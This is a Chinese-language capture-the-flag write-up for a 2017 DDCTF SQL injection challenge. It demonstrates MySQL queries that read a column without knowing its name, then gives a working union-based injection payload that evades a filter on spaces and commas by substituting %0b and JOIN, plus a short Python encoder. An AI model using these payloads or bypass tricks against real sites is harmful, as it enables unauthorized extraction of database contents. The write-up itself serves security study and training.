2017-DDCTF-SQL注入之过滤列名get数据

2017-DDCTF-SQL注入之过滤列名get数据

先说mysql

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
mysql> select * from (select 1)a,(select 2)b,(select 3)c;
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c union select * from user;
+---+--------+----------+
| 1 | 2 | 3 |
+---+--------+----------+
| 1 | 2 | 3 |
| 1 | admin | admin |
| 2 | me7ell | admin123 |
| 3 | qqq | qqq |
+---+--------+----------+
4 rows in set (0.00 sec)
mysql> select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from user)e;
+----------+
| 3 |
+----------+
| 3 |
| admin |
| admin123 |
| qqq |
+----------+
4 rows in set (0.00 sec)
mysql> select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from user)e limit 1 offset 3 ;
+------+
| 3 |
+------+
| qqq |
+------+
1 row in set (0.00 sec)
mysql> select * from user where id=1 union select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | admin | admin |
| 1 | 2 | 3 |
+----+----------+----------+
2 rows in set (0.00 sec)
mysql> select * from user where id=1 union select (select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from user)e limit 1 offset 3),2,3;
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | admin |
| qqq | 2 | 3 |
+------+----------+----------+
2 rows in set (0.00 sec)

然后看题目 过滤了空格,逗号

空格代替方法很多MySQL5 09 0A 0B 0C 0D A0 20,逗号换为JOIN

union select * from (select 1)x JOIN (select database())y JOIN (select 3)z JOIN (select 4)w

经过测试 有4个列,空格替换后,可以得到 数据库名t1,在回显地方正常替换其他语句可得表名等数据,

表名news,四个字段id,title,content,secret,

但是将secret带入查询被拦截,使用上面提到的方法

union select * from (select 1)x JOIN (select 2)y JOIN (select 3)z JOIN (select 4)w通过y这个地方回显

将(select 2)y替换为(select secret from news)y会被拦截

所以最终替换为

1
2
3
4
(select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from news)e limit 1 offset 4)y
payload=
union select * from (select 1)x JOIN (select e.2 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from news)e limit 1 offset 4)y JOIN (select 3)z JOIN (select 4)w

编码一下

1
2
3
4
5
6
7
8
#pay = "union select * from (select 1)a JOIN (select database())b JOIN (select 3)c JOIN (select 4)d"
pay = "union select * from (select 1)x JOIN (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from news)e limit 1 offset 4)y JOIN (select 3)z JOIN (select 4)w"
print pay.replace(' ', '%0b').replace(',','%0bJOIN%0b')
# union%0bselect%0b*%0bfrom%0b(select%0b1)x%0bJOIN%0b(select%0be.4%0bfrom%0b(select%0b*%0bfrom%0b(select%0b1)a%0bJOIN%0b(select%0b2)b%0bJOIN%0b(select%0b3)c%0bJOIN%0b(select%0b4)d%0bunion%0bselect%0b*%0bfrom%0bnews)e%0blimit%0b1%0boffset%0b4)y%0bJOIN%0b(select%0b3)z%0bJOIN%0b(select%0b4)w

得到flag

1
flag{DDCTF-******@didichuxing.com}

参考:Mysql巧妙绕过未知字段名的技巧